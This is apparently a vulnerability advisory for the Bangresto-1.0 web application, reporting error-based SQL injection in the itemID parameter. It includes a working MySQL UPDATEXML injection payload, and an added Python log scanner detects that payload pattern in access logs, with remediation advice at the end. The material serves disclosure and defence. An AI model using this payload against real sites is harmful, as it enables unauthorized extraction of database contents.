Bangresto-1.0
Vendor
Description:
The itemID parameter appears to be vulnerable to SQL injection attacks.
The payload ' was submitted in the itemID parameter, and a database error message was returned.
An attacker can steal all information from the database of this application.
STATUS: CRITICAL Vulnerability
[+] Payload:
---
Parameter: itemID (GET)
Type: error-based
Title: MySQL >= 5.1 error-based - Parameter replace (UPDATEXML)
Payload: itemID=(UPDATEXML(2539,CONCAT(0x2e,0x7171767871,(SELECT (ELT(2539=2539,1))),0x7170706a71),2327))&menuID=1
---
Reproduce:
Proof and Exploit:
Time spent
00:30:00
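
Detection example added here, not part of the original advisory: the script scans web access-log lines for requests whose itemID or menuID value is not a plain integer, and labels those containing the UPDATEXML pattern from the payload above (EXTRACTVALUE, the sibling MySQL XML function, is included as a generalization). The log lines, addresses and the /example/item.php path are constructed placeholders, and treating both parameters as integer IDs is an assumption.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Parameters named in the advisory; assumed here to be integer IDs.
ID_PARAMS = ("itemID", "menuID")
# MySQL XML functions whose error messages leak data (UPDATEXML is the one in the payload).
ERROR_FUNCS = re.compile(r"\b(updatexml|extractvalue)\s*\(", re.I)
# Request field of a combined-format access-log line.
REQUEST = re.compile(r'"(?:GET|POST) (\S+) HTTP/[\d.]+"')

def classify(value):
    """Return None for a clean integer ID, otherwise a finding label."""
    if re.fullmatch(r"\d+", value):
        return None
    if ERROR_FUNCS.search(value):
        return "error-based-sqli"
    return "non-integer-id"

def scan(lines):
    """Return (line_no, param, label) for each suspicious ID parameter."""
    findings = []
    for no, line in enumerate(lines, 1):
        m = REQUEST.search(line)
        if not m:
            continue
        # parse_qs URL-decodes values, so %27 and %20 are checked in decoded form.
        query = parse_qs(urlsplit(m.group(1)).query, keep_blank_values=True)
        for param in ID_PARAMS:
            for value in query.get(param, []):
                label = classify(value)
                if label:
                    findings.append((no, param, label))
    return findings

# Constructed sample log lines (path and addresses are placeholders).
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Jan/2024:10:00:00 +0000] "GET /example/item.php?itemID=12&menuID=1 HTTP/1.1" 200 512',
    '192.0.2.66 - - [01/Jan/2024:10:00:05 +0000] "GET /example/item.php?itemID=%27&menuID=1 HTTP/1.1" 500 230',
    '192.0.2.66 - - [01/Jan/2024:10:00:09 +0000] "GET /example/item.php?itemID=(UPDATEXML(2539,CONCAT(0x2e,0x7171767871,(SELECT%20(ELT(2539=2539,1))),0x7170706a71),2327))&menuID=1 HTTP/1.1" 500 310',
]

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

The same integer-only check in `classify` is what the application should enforce on itemID before it reaches the query, alongside a parameterized statement.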
